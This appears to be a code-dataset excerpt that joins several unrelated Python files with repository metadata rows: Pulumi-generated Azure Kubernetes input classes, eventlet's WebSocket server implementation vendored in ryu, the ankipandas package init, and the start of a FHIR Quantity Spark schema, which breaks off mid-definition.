@net_ipv4_neigh_default_gc_thresh3.setter
def net_ipv4_neigh_default_gc_thresh3(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_neigh_default_gc_thresh3", value)
@property
@pulumi.getter(name="netIpv4TcpFinTimeout")
def net_ipv4_tcp_fin_timeout(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_fin_timeout.
"""
return pulumi.get(self, "net_ipv4_tcp_fin_timeout")
@net_ipv4_tcp_fin_timeout.setter
def net_ipv4_tcp_fin_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcp_fin_timeout", value)
@property
@pulumi.getter(name="netIpv4TcpKeepaliveProbes")
def net_ipv4_tcp_keepalive_probes(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_keepalive_probes.
"""
return pulumi.get(self, "net_ipv4_tcp_keepalive_probes")
@net_ipv4_tcp_keepalive_probes.setter
def net_ipv4_tcp_keepalive_probes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcp_keepalive_probes", value)
@property
@pulumi.getter(name="netIpv4TcpKeepaliveTime")
def net_ipv4_tcp_keepalive_time(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_keepalive_time.
"""
return pulumi.get(self, "net_ipv4_tcp_keepalive_time")
@net_ipv4_tcp_keepalive_time.setter
def net_ipv4_tcp_keepalive_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcp_keepalive_time", value)
@property
@pulumi.getter(name="netIpv4TcpMaxSynBacklog")
def net_ipv4_tcp_max_syn_backlog(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_max_syn_backlog.
"""
return pulumi.get(self, "net_ipv4_tcp_max_syn_backlog")
@net_ipv4_tcp_max_syn_backlog.setter
def net_ipv4_tcp_max_syn_backlog(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcp_max_syn_backlog", value)
@property
@pulumi.getter(name="netIpv4TcpMaxTwBuckets")
def net_ipv4_tcp_max_tw_buckets(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_max_tw_buckets.
"""
return pulumi.get(self, "net_ipv4_tcp_max_tw_buckets")
@net_ipv4_tcp_max_tw_buckets.setter
def net_ipv4_tcp_max_tw_buckets(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcp_max_tw_buckets", value)
@property
@pulumi.getter(name="netIpv4TcpTwReuse")
def net_ipv4_tcp_tw_reuse(self) -> Optional[pulumi.Input[bool]]:
"""
Sysctl setting net.ipv4.tcp_tw_reuse.
"""
return pulumi.get(self, "net_ipv4_tcp_tw_reuse")
@net_ipv4_tcp_tw_reuse.setter
def net_ipv4_tcp_tw_reuse(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "net_ipv4_tcp_tw_reuse", value)
@property
@pulumi.getter(name="netIpv4TcpkeepaliveIntvl")
def net_ipv4_tcpkeepalive_intvl(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_keepalive_intvl.
"""
return pulumi.get(self, "net_ipv4_tcpkeepalive_intvl")
@net_ipv4_tcpkeepalive_intvl.setter
def net_ipv4_tcpkeepalive_intvl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcpkeepalive_intvl", value)
@property
@pulumi.getter(name="netNetfilterNfConntrackBuckets")
def net_netfilter_nf_conntrack_buckets(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.netfilter.nf_conntrack_buckets.
"""
return pulumi.get(self, "net_netfilter_nf_conntrack_buckets")
@net_netfilter_nf_conntrack_buckets.setter
def net_netfilter_nf_conntrack_buckets(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_netfilter_nf_conntrack_buckets", value)
@property
@pulumi.getter(name="netNetfilterNfConntrackMax")
def net_netfilter_nf_conntrack_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.netfilter.nf_conntrack_max.
"""
return pulumi.get(self, "net_netfilter_nf_conntrack_max")
@net_netfilter_nf_conntrack_max.setter
def net_netfilter_nf_conntrack_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_netfilter_nf_conntrack_max", value)
@property
@pulumi.getter(name="vmMaxMapCount")
def vm_max_map_count(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting vm.max_map_count.
"""
return pulumi.get(self, "vm_max_map_count")
@vm_max_map_count.setter
def vm_max_map_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "vm_max_map_count", value)
@property
@pulumi.getter(name="vmSwappiness")
def vm_swappiness(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting vm.swappiness.
"""
return pulumi.get(self, "vm_swappiness")
@vm_swappiness.setter
def vm_swappiness(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "vm_swappiness", value)
@property
@pulumi.getter(name="vmVfsCachePressure")
def vm_vfs_cache_pressure(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting vm.vfs_cache_pressure.
"""
return pulumi.get(self, "vm_vfs_cache_pressure")
@vm_vfs_cache_pressure.setter
def vm_vfs_cache_pressure(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "vm_vfs_cache_pressure", value)
@pulumi.input_type
class TimeInWeekArgs:
def __init__(__self__, *,
day: Optional[pulumi.Input[Union[str, 'WeekDay']]] = None,
hour_slots: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None):
"""
Time in a week.
:param pulumi.Input[Union[str, 'WeekDay']] day: A day in a week.
:param pulumi.Input[Sequence[pulumi.Input[int]]] hour_slots: hour slots in a day.
"""
if day is not None:
pulumi.set(__self__, "day", day)
if hour_slots is not None:
pulumi.set(__self__, "hour_slots", hour_slots)
@property
@pulumi.getter
def day(self) -> Optional[pulumi.Input[Union[str, 'WeekDay']]]:
"""
A day in a week.
"""
return pulumi.get(self, "day")
@day.setter
def day(self, value: Optional[pulumi.Input[Union[str, 'WeekDay']]]):
pulumi.set(self, "day", value)
@property
@pulumi.getter(name="hourSlots")
def hour_slots(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
"""
hour slots in a day.
"""
return pulumi.get(self, "hour_slots")
@hour_slots.setter
def hour_slots(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
pulumi.set(self, "hour_slots", value)
@pulumi.input_type
class TimeSpanArgs:
def __init__(__self__, *,
end: Optional[pulumi.Input[str]] = None,
start: Optional[pulumi.Input[str]] = None):
"""
The time span with start and end properties.
:param pulumi.Input[str] end: The end of a time span
:param pulumi.Input[str] start: The start of a time span
"""
if end is not None:
pulumi.set(__self__, "end", end)
if start is not None:
pulumi.set(__self__, "start", start)
@property
@pulumi.getter
def end(self) -> Optional[pulumi.Input[str]]:
"""
The end of a time span
"""
return pulumi.get(self, "end")
@end.setter
def end(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "end", value)
@property
@pulumi.getter
def start(self) -> Optional[pulumi.Input[str]]:
"""
The start of a time span
"""
return pulumi.get(self, "start")
@start.setter
def start(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start", value)
@pulumi.input_type
class UserAssignedIdentityArgs:
def __init__(__self__, *,
client_id: Optional[pulumi.Input[str]] = None,
object_id: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] client_id: The client id of the user assigned identity.
:param pulumi.Input[str] object_id: The object id of the user assigned identity.
:param pulumi.Input[str] resource_id: The resource id of the user assigned identity.
"""
if client_id is not None:
pulumi.set(__self__, "client_id", client_id)
if object_id is not None:
pulumi.set(__self__, "object_id", object_id)
if resource_id is not None:
pulumi.set(__self__, "resource_id", resource_id)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Optional[pulumi.Input[str]]:
"""
The client id of the user assigned identity.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter(name="objectId")
def object_id(self) -> Optional[pulumi.Input[str]]:
"""
The object id of the user assigned identity.
"""
return pulumi.get(self, "object_id")
@object_id.setter
def object_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_id", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource id of the user assigned identity.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_id", value)
| 43.18613
| 551
| 0.672328
|
4a07c8d8e1e39931d599b59717771dd57278d90a
| 25,108
|
py
|
Python
|
ryu/contrib/_eventlet/websocket.py
|
umkcdcrg01/ryu_openflow
|
37ed5b88f7d119344e07c95314a7450235c037a8
|
[
"Apache-2.0"
] | 269
|
2015-03-08T11:32:45.000Z
|
2022-03-30T11:18:16.000Z
|
ryu/contrib/_eventlet/websocket.py
|
umkcdcrg01/ryu_openflow
|
37ed5b88f7d119344e07c95314a7450235c037a8
|
[
"Apache-2.0"
] | 2
|
2018-12-23T13:52:26.000Z
|
2021-10-31T13:01:43.000Z
|
ryu/contrib/_eventlet/websocket.py
|
umkcdcrg01/ryu_openflow
|
37ed5b88f7d119344e07c95314a7450235c037a8
|
[
"Apache-2.0"
] | 205
|
2015-01-13T04:52:25.000Z
|
2022-03-30T13:37:33.000Z
|
import base64
import codecs
import collections
import errno
from random import Random
import string
import struct
import sys
import time
from socket import error as SocketError
try:
from hashlib import md5, sha1
except ImportError: #pragma NO COVER
from md5 import md5
from sha import sha as sha1
import eventlet
from eventlet import semaphore
from eventlet import wsgi
from eventlet.green import socket
from eventlet.support import get_errno
# Python 2's utf8 decoding is more lenient than we'd like
# In order to pass autobahn's testsuite we need stricter validation
# if available...
for _mod in ('wsaccel.utf8validator', 'autobahn.utf8validator'):
# autobahn has it's own python-based validator. in newest versions
# this prefers to use wsaccel, a cython based implementation, if available.
# wsaccel may also be installed w/out autobahn, or with a earlier version.
try:
utf8validator = __import__(_mod, {}, {}, [''])
except ImportError:
utf8validator = None
else:
break
ACCEPTABLE_CLIENT_ERRORS = set((errno.ECONNRESET, errno.EPIPE))
__all__ = ["WebSocketWSGI", "WebSocket"]
PROTOCOL_GUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
VALID_CLOSE_STATUS = (range(1000, 1004)
+ range(1007, 1012)
# 3000-3999: reserved for use by libraries, frameworks,
# and applications
+ range(3000, 4000)
# 4000-4999: reserved for private use and thus can't
# be registered
+ range(4000, 5000))
class BadRequest(Exception):
def __init__(self, status='400 Bad Request', body=None, headers=None):
super(Exception, self).__init__()
self.status = status
self.body = body
self.headers = headers
class WebSocketWSGI(object):
"""Wraps a websocket handler function in a WSGI application.
Use it like this::
@websocket.WebSocketWSGI
def my_handler(ws):
from_browser = ws.wait()
ws.send("from server")
The single argument to the function will be an instance of
:class:`WebSocket`. To close the socket, simply return from the
function. Note that the server will log the websocket request at
the time of closure.
"""
def __init__(self, handler):
self.handler = handler
self.protocol_version = None
self.support_legacy_versions = True
self.supported_protocols = []
self.origin_checker = None
@classmethod
def configured(cls,
handler=None,
supported_protocols=None,
origin_checker=None,
support_legacy_versions=False):
def decorator(handler):
inst = cls(handler)
inst.support_legacy_versions = support_legacy_versions
inst.origin_checker = origin_checker
if supported_protocols:
inst.supported_protocols = supported_protocols
return inst
if handler is None:
return decorator
return decorator(handler)
def __call__(self, environ, start_response):
http_connection_parts = [
part.strip()
for part in environ.get('HTTP_CONNECTION', '').lower().split(',')]
if not ('upgrade' in http_connection_parts and
environ.get('HTTP_UPGRADE', '').lower() == 'websocket'):
# need to check a few more things here for true compliance
start_response('400 Bad Request', [('Connection', 'close')])
return []
try:
if 'HTTP_SEC_WEBSOCKET_VERSION' in environ:
ws = self._handle_hybi_request(environ)
elif self.support_legacy_versions:
ws = self._handle_legacy_request(environ)
else:
raise BadRequest()
except BadRequest as e:
status = e.status
body = e.body or ''
headers = e.headers or []
start_response(status,
[('Connection', 'close'), ] + headers)
return [body]
try:
self.handler(ws)
except socket.error as e:
if get_errno(e) not in ACCEPTABLE_CLIENT_ERRORS:
raise
# Make sure we send the closing frame
ws._send_closing_frame(True)
# use this undocumented feature of eventlet.wsgi to ensure that it
# doesn't barf on the fact that we didn't call start_response
return wsgi.ALREADY_HANDLED
def _handle_legacy_request(self, environ):
sock = environ['eventlet.input'].get_socket()
if 'HTTP_SEC_WEBSOCKET_KEY1' in environ:
self.protocol_version = 76
if 'HTTP_SEC_WEBSOCKET_KEY2' not in environ:
raise BadRequest()
else:
self.protocol_version = 75
if self.protocol_version == 76:
key1 = self._extract_number(environ['HTTP_SEC_WEBSOCKET_KEY1'])
key2 = self._extract_number(environ['HTTP_SEC_WEBSOCKET_KEY2'])
# There's no content-length header in the request, but it has 8
# bytes of data.
environ['wsgi.input'].content_length = 8
key3 = environ['wsgi.input'].read(8)
key = struct.pack(">II", key1, key2) + key3
response = md5(key).digest()
# Start building the response
scheme = 'ws'
if environ.get('wsgi.url_scheme') == 'https':
scheme = 'wss'
location = '%s://%s%s%s' % (
scheme,
environ.get('HTTP_HOST'),
environ.get('SCRIPT_NAME'),
environ.get('PATH_INFO')
)
qs = environ.get('QUERY_STRING')
if qs is not None:
location += '?' + qs
if self.protocol_version == 75:
handshake_reply = ("HTTP/1.1 101 Web Socket Protocol Handshake\r\n"
"Upgrade: WebSocket\r\n"
"Connection: Upgrade\r\n"
"WebSocket-Origin: %s\r\n"
"WebSocket-Location: %s\r\n\r\n" % (
environ.get('HTTP_ORIGIN'),
location))
elif self.protocol_version == 76:
handshake_reply = ("HTTP/1.1 101 WebSocket Protocol Handshake\r\n"
"Upgrade: WebSocket\r\n"
"Connection: Upgrade\r\n"
"Sec-WebSocket-Origin: %s\r\n"
"Sec-WebSocket-Protocol: %s\r\n"
"Sec-WebSocket-Location: %s\r\n"
"\r\n%s" % (
environ.get('HTTP_ORIGIN'),
environ.get('HTTP_SEC_WEBSOCKET_PROTOCOL', 'default'),
location,
response))
else: #pragma NO COVER
raise ValueError("Unknown WebSocket protocol version.")
sock.sendall(handshake_reply)
return WebSocket(sock, environ, self.protocol_version)
def _handle_hybi_request(self, environ):
sock = environ['eventlet.input'].get_socket()
hybi_version = environ['HTTP_SEC_WEBSOCKET_VERSION']
if hybi_version not in ('8', '13', ):
raise BadRequest(status='426 Upgrade Required',
headers=[('Sec-WebSocket-Version', '8, 13')])
self.protocol_version = int(hybi_version)
if 'HTTP_SEC_WEBSOCKET_KEY' not in environ:
# That's bad.
raise BadRequest()
origin = environ.get(
'HTTP_ORIGIN',
(environ.get('HTTP_SEC_WEBSOCKET_ORIGIN', '')
if self.protocol_version <= 8 else ''))
if self.origin_checker is not None:
if not self.origin_checker(environ.get('HTTP_HOST'), origin):
raise BadRequest(status='403 Forbidden')
protocols = environ.get('HTTP_SEC_WEBSOCKET_PROTOCOL', None)
negotiated_protocol = None
if protocols:
for p in (i.strip() for i in protocols.split(',')):
if p in self.supported_protocols:
negotiated_protocol = p
break
#extensions = environ.get('HTTP_SEC_WEBSOCKET_EXTENSIONS', None)
#if extensions:
# extensions = [i.strip() for i in extensions.split(',')]
key = environ['HTTP_SEC_WEBSOCKET_KEY']
response = base64.b64encode(sha1(key + PROTOCOL_GUID).digest())
handshake_reply = ["HTTP/1.1 101 Switching Protocols",
"Upgrade: websocket",
"Connection: Upgrade",
"Sec-WebSocket-Accept: %s" % (response, )]
if negotiated_protocol:
handshake_reply.append("Sec-WebSocket-Protocol: %s"
% (negotiated_protocol, ))
sock.sendall('\r\n'.join(handshake_reply) + '\r\n\r\n')
return RFC6455WebSocket(sock, environ, self.protocol_version,
protocol=negotiated_protocol)
def _extract_number(self, value):
"""
Utility function which, given a string like 'g98sd 5[]221@1', will
return 9852211. Used to parse the Sec-WebSocket-Key headers.
"""
out = ""
spaces = 0
for char in value:
if char in string.digits:
out += char
elif char == " ":
spaces += 1
return int(out) / spaces
class WebSocket(object):
"""A websocket object that handles the details of
serialization/deserialization to the socket.
The primary way to interact with a :class:`WebSocket` object is to
call :meth:`send` and :meth:`wait` in order to pass messages back
and forth with the browser. Also available are the following
properties:
path
The path value of the request. This is the same as the WSGI PATH_INFO variable, but more convenient.
protocol
The value of the Websocket-Protocol header.
origin
The value of the 'Origin' header.
environ
The full WSGI environment for this request.
"""
def __init__(self, sock, environ, version=76):
"""
:param socket: The eventlet socket
:type socket: :class:`eventlet.greenio.GreenSocket`
:param environ: The wsgi environment
:param version: The WebSocket spec version to follow (default is 76)
"""
self.socket = sock
self.origin = environ.get('HTTP_ORIGIN')
self.protocol = environ.get('HTTP_WEBSOCKET_PROTOCOL')
self.path = environ.get('PATH_INFO')
self.environ = environ
self.version = version
self.websocket_closed = False
self._buf = ""
self._msgs = collections.deque()
self._sendlock = semaphore.Semaphore()
@staticmethod
def _pack_message(message):
"""Pack the message inside ``00`` and ``FF``
As per the dataframing section (5.3) for the websocket spec
"""
if isinstance(message, unicode):
message = message.encode('utf-8')
elif not isinstance(message, str):
message = str(message)
packed = "\x00%s\xFF" % message
return packed
def _parse_messages(self):
""" Parses for messages in the buffer *buf*. It is assumed that
the buffer contains the start character for a message, but that it
may contain only part of the rest of the message.
Returns an array of messages, and the buffer remainder that
didn't contain any full messages."""
msgs = []
end_idx = 0
buf = self._buf
while buf:
frame_type = ord(buf[0])
if frame_type == 0:
# Normal message.
end_idx = buf.find("\xFF")
if end_idx == -1: #pragma NO COVER
break
msgs.append(buf[1:end_idx].decode('utf-8', 'replace'))
buf = buf[end_idx+1:]
elif frame_type == 255:
# Closing handshake.
assert ord(buf[1]) == 0, "Unexpected closing handshake: %r" % buf
self.websocket_closed = True
break
else:
raise ValueError("Don't understand how to parse this type of message: %r" % buf)
self._buf = buf
return msgs
def send(self, message):
"""Send a message to the browser.
*message* should be convertable to a string; unicode objects should be
encodable as utf-8. Raises socket.error with errno of 32
(broken pipe) if the socket has already been closed by the client."""
packed = self._pack_message(message)
# if two greenthreads are trying to send at the same time
# on the same socket, sendlock prevents interleaving and corruption
self._sendlock.acquire()
try:
self.socket.sendall(packed)
finally:
self._sendlock.release()
def wait(self):
"""Waits for and deserializes messages.
Returns a single message; the oldest not yet processed. If the client
has already closed the connection, returns None. This is different
from normal socket behavior because the empty string is a valid
websocket message."""
while not self._msgs:
# Websocket might be closed already.
if self.websocket_closed:
return None
# no parsed messages, must mean buf needs more data
delta = self.socket.recv(8096)
if delta == '':
return None
self._buf += delta
msgs = self._parse_messages()
self._msgs.extend(msgs)
return self._msgs.popleft()
def _send_closing_frame(self, ignore_send_errors=False):
"""Sends the closing frame to the client, if required."""
if self.version == 76 and not self.websocket_closed:
try:
self.socket.sendall("\xff\x00")
except SocketError:
# Sometimes, like when the remote side cuts off the connection,
# we don't care about this.
if not ignore_send_errors: #pragma NO COVER
raise
self.websocket_closed = True
def close(self):
"""Forcibly close the websocket; generally it is preferable to
return from the handler method."""
self._send_closing_frame()
self.socket.shutdown(True)
self.socket.close()
class ConnectionClosedError(Exception):
pass
class FailedConnectionError(Exception):
def __init__(self, status, message):
super(FailedConnectionError, self).__init__(status, message)
self.message = message
self.status = status
class ProtocolError(ValueError):
pass
class RFC6455WebSocket(WebSocket):
def __init__(self, sock, environ, version=13, protocol=None, client=False):
super(RFC6455WebSocket, self).__init__(sock, environ, version)
self.iterator = self._iter_frames()
self.client = client
self.protocol = protocol
class UTF8Decoder(object):
def __init__(self):
if utf8validator:
self.validator = utf8validator.Utf8Validator()
else:
self.validator = None
decoderclass = codecs.getincrementaldecoder('utf8')
self.decoder = decoderclass()
def reset(self):
if self.validator:
self.validator.reset()
self.decoder.reset()
def decode(self, data, final=False):
if self.validator:
valid, eocp, c_i, t_i = self.validator.validate(data)
if not valid:
raise ValueError('Data is not valid unicode')
return self.decoder.decode(data, final)
def _get_bytes(self, numbytes):
data = ''
while len(data) < numbytes:
d = self.socket.recv(numbytes - len(data))
if not d:
raise ConnectionClosedError()
data = data + d
return data
class Message(object):
def __init__(self, opcode, decoder=None):
self.decoder = decoder
self.data = []
self.finished = False
self.opcode = opcode
def push(self, data, final=False):
if self.decoder:
data = self.decoder.decode(data, final=final)
self.finished = final
self.data.append(data)
def getvalue(self):
return ''.join(self.data)
@staticmethod
def _apply_mask(data, mask, length=None, offset=0):
if length is None:
length = len(data)
cnt = range(length)
return ''.join(chr(ord(data[i]) ^ mask[(offset + i) % 4]) for i in cnt)
def _handle_control_frame(self, opcode, data):
if opcode == 8: # connection close
if not data:
status = 1000
elif len(data) > 1:
status = struct.unpack_from('!H', data)[0]
if not status or status not in VALID_CLOSE_STATUS:
raise FailedConnectionError(
1002,
"Unexpected close status code.")
try:
data = self.UTF8Decoder().decode(data[2:], True)
except (UnicodeDecodeError, ValueError):
raise FailedConnectionError(
1002,
"Close message data should be valid UTF-8.")
else:
status = 1002
self.close(close_data=(status, ''))
raise ConnectionClosedError()
elif opcode == 9: # ping
self.send(data, control_code=0xA)
elif opcode == 0xA: # pong
pass
else:
raise FailedConnectionError(
1002, "Unknown control frame received.")
def _iter_frames(self):
fragmented_message = None
try:
while True:
message = self._recv_frame(message=fragmented_message)
if message.opcode & 8:
self._handle_control_frame(
message.opcode, message.getvalue())
continue
if fragmented_message and message is not fragmented_message:
raise RuntimeError('Unexpected message change.')
fragmented_message = message
if message.finished:
data = fragmented_message.getvalue()
fragmented_message = None
yield data
except FailedConnectionError:
exc_typ, exc_val, exc_tb = sys.exc_info()
self.close(close_data=(exc_val.status, exc_val.message))
except ConnectionClosedError:
return
except Exception:
self.close(close_data=(1011, 'Internal Server Error'))
raise
def _recv_frame(self, message=None):
recv = self._get_bytes
header = recv(2)
a, b = struct.unpack('!BB', header)
finished = a >> 7 == 1
rsv123 = a >> 4 & 7
if rsv123:
# must be zero
raise FailedConnectionError(
1002,
"RSV1, RSV2, RSV3: MUST be 0 unless an extension is"
" negotiated that defines meanings for non-zero values.")
opcode = a & 15
if opcode not in (0, 1, 2, 8, 9, 0xA):
raise FailedConnectionError(1002, "Unknown opcode received.")
masked = b & 128 == 128
if not masked and not self.client:
raise FailedConnectionError(1002, "A client MUST mask all frames"
" that it sends to the server")
length = b & 127
if opcode & 8:
if not finished:
raise FailedConnectionError(1002, "Control frames must not"
" be fragmented.")
if length > 125:
raise FailedConnectionError(
1002,
"All control frames MUST have a payload length of 125"
" bytes or less")
elif opcode and message:
raise FailedConnectionError(
1002,
"Received a non-continuation opcode within"
" fragmented message.")
elif not opcode and not message:
raise FailedConnectionError(
1002,
"Received continuation opcode with no previous"
" fragments received.")
if length == 126:
length = struct.unpack('!H', recv(2))[0]
elif length == 127:
length = struct.unpack('!Q', recv(8))[0]
if masked:
mask = struct.unpack('!BBBB', recv(4))
received = 0
if not message or opcode & 8:
decoder = self.UTF8Decoder() if opcode == 1 else None
message = self.Message(opcode, decoder=decoder)
if not length:
message.push('', final=finished)
else:
while received < length:
d = self.socket.recv(length - received)
if not d:
raise ConnectionClosedError()
dlen = len(d)
if masked:
d = self._apply_mask(d, mask, length=dlen, offset=received)
received = received + dlen
try:
message.push(d, final=finished)
except (UnicodeDecodeError, ValueError):
raise FailedConnectionError(
1007, "Text data must be valid utf-8")
return message
@staticmethod
def _pack_message(message, masked=False,
continuation=False, final=True, control_code=None):
is_text = False
if isinstance(message, unicode):
message = message.encode('utf-8')
is_text = True
length = len(message)
if not length:
# no point masking empty data
masked = False
if control_code:
if control_code not in (8, 9, 0xA):
raise ProtocolError('Unknown control opcode.')
if continuation or not final:
raise ProtocolError('Control frame cannot be a fragment.')
if length > 125:
raise ProtocolError('Control frame data too large (>125).')
header = struct.pack('!B', control_code | 1 << 7)
else:
opcode = 0 if continuation else (1 if is_text else 2)
header = struct.pack('!B', opcode | (1 << 7 if final else 0))
lengthdata = 1 << 7 if masked else 0
if length > 65535:
lengthdata = struct.pack('!BQ', lengthdata | 127, length)
elif length > 125:
lengthdata = struct.pack('!BH', lengthdata | 126, length)
else:
lengthdata = struct.pack('!B', lengthdata | length)
if masked:
# NOTE: RFC6455 states:
# A server MUST NOT mask any frames that it sends to the client
rand = Random(time.time())
mask = map(rand.getrandbits, (8, ) * 4)
message = RFC6455WebSocket._apply_mask(message, mask, length)
maskdata = struct.pack('!BBBB', *mask)
else:
maskdata = ''
return ''.join((header, lengthdata, maskdata, message))
def wait(self):
for i in self.iterator:
return i
def _send(self, frame):
self._sendlock.acquire()
try:
self.socket.sendall(frame)
finally:
self._sendlock.release()
def send(self, message, **kw):
kw['masked'] = self.client
payload = self._pack_message(message, **kw)
self._send(payload)
def _send_closing_frame(self, ignore_send_errors=False, close_data=None):
if self.version in (8, 13) and not self.websocket_closed:
if close_data is not None:
status, msg = close_data
if isinstance(msg, unicode):
msg = msg.encode('utf-8')
data = struct.pack('!H', status) + msg
else:
data = ''
try:
self.send(data, control_code=8)
except SocketError:
# Sometimes, like when the remote side cuts off the connection,
# we don't care about this.
if not ignore_send_errors: # pragma NO COVER
raise
self.websocket_closed = True
def close(self, close_data=None):
"""Forcibly close the websocket; generally it is preferable to
return from the handler method."""
self._send_closing_frame(close_data=close_data)
self.socket.shutdown(socket.SHUT_WR)
self.socket.close()
| 38.216134
| 109
| 0.561614
|
4a07c93eac8c767581676ac9281a379f9bdf0c47
| 338
|
py
|
Python
|
ankipandas/__init__.py
|
khonkhortisan/AnkiPandas
|
44ca736a46b22fb2ffb200cc4f2c3184184ee29d
|
[
"MIT"
] | 1
|
2020-05-20T18:35:20.000Z
|
2020-05-20T18:35:20.000Z
|
ankipandas/__init__.py
|
andrewsanchez/AnkiPandas
|
3f6e2309493b73237b89ddf76561694c940871ca
|
[
"MIT"
] | null | null | null |
ankipandas/__init__.py
|
andrewsanchez/AnkiPandas
|
3f6e2309493b73237b89ddf76561694c940871ca
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import ankipandas.raw
import ankipandas.paths
import ankipandas.util
import ankipandas.paths
import ankipandas.collection
from ankipandas.collection import Collection
from ankipandas.paths import find_db, db_path_input
from ankipandas.ankidf import AnkiDataFrame
from ankipandas.util.log import log, set_log_level
| 28.166667
| 51
| 0.857988
|
4a07c991c88432477757d3982978944d1d0f22c0
| 8,645
|
py
|
Python
|
spark_fhir_schemas/r4/complex_types/quantity.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | 2
|
2020-10-31T23:25:01.000Z
|
2021-06-09T14:12:42.000Z
|
spark_fhir_schemas/r4/complex_types/quantity.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/quantity.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | null | null | null |
from typing import Union, List, Optional
from pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType
# This file is auto-generated by generate_schema so do not edit it manually
# noinspection PyPep8Naming
class QuantitySchema:
"""
A measured amount (or an amount that can potentially be measured). Note that
measured amounts include amounts that are not precisely quantified, including
amounts involving arbitrary units and floating currencies.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueUrl",
],
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
include_modifierExtension: Optional[bool] = False,
) -> Union[StructType, DataType]:
"""
A measured amount (or an amount that can potentially be measured). Note that
measured amounts include amounts that are not precisely quantified, including
amounts involving arbitrary units and floating currencies.
id: Unique id for the element within a resource (for internal references). This
may be any string value that does not contain spaces.
extension: May be used to represent additional information that is not part of the basic
definition of the element. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
value: The value of the measured amount. The value includes an implicit precision in
the presentation of the value.
comparator: How the value should be understood and represented - whether the actual value
is greater or less than the stated value due to measurement issues; e.g. if
the comparator is "<" , then the real value is < stated value.
unit: A human-readable form of the unit.
system: The identification of the system that provides the coded form of the unit.
code: A computer processable form of the unit in some unit representation system.
"""
from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.r4.simple_types.decimal import decimalSchema
from spark_fhir_schemas.r4.simple_types.uri import uriSchema
from spark_fhir_schemas.r4.simple_types.code import codeSchema
if (
max_recursion_limit
and nesting_list.count("Quantity") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["Quantity"]
schema = StructType(
[
# Unique id for the element within a resource (for internal references). This
# may be any string value that does not contain spaces.
StructField("id", StringType(), True),
# May be used to represent additional information that is not part of the basic
# definition of the element. To make the use of extensions safe and manageable,
# there is a strict set of governance applied to the definition and use of
# extensions. Though any implementer can define an extension, there is a set of
# requirements that SHALL be met as part of the definition of the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
